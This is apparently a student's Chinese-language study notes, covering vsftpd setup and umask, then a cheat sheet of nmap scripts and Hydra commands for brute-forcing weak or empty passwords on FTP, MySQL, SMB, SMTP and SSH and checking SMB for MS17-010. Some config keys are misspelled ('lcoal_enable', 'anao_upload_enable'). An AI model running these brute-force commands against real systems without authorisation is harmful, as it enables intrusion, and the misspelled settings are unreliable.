2018寒假作业笔记

ftp

apt-get install vsftpd

ftp的配置文件主要有三个，位于/etc/vsftpd/目录下，分别是：

• ftpusers 该文件用来指定那些用户不能访问ftp服务器。
• user_list 该文件用来指示的默认账户在默认情况下也不能访问ftp
• vsftpd.conf vsftpd的主配置文件

编辑vsftpd.conf

listen=YES
//开启端口监听
anonymous_enable=YES
//允许匿名下载
lcoal_enable=YES
//允许本地用户登录
anao_upload_enable=NO
//禁止匿名用户上传
local_umask=022
//umask值

umask权限总结

文件省缺权限:666 文件夹省缺权限:777 umask的作用就是省缺权限减去umask每位的值得到新建文件的权限 例如默认umask为022 666-022=644 777-022=755

---

nmap弱口令爆破

• ftp nmap -p 21 -sV --script=ftp-anon -v x.x.x.x(ip)

• mysql nmap -p 3306 --script mysql-empty-password.nse -v x.x.x.x(ip)//空密码爆破,适用于批量 nmap -p 3306 --script mysql-brute.nse -v x.x.x.x(ip)//弱口令爆破

• smb nmap -p 445 --script smb-vuln-ms17-010.nse x.x.x.x(ip) > 脚本集 > smb-vuln-ms08-067.nse > smb-vuln-ms10-054.nse > smb-vuln-ms10-061.nse > smb-vuln-ms17-010.nse

• smtp nmap -p 25 --script smtp-brute.nse -v x.x.x.x(ip)

  Hydra爆破

• ssh hydra 127.0.0.2 ssh -l root -P pass.txt

• smb hydra -l administrator -P pass.txt IP smb

• ftp hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV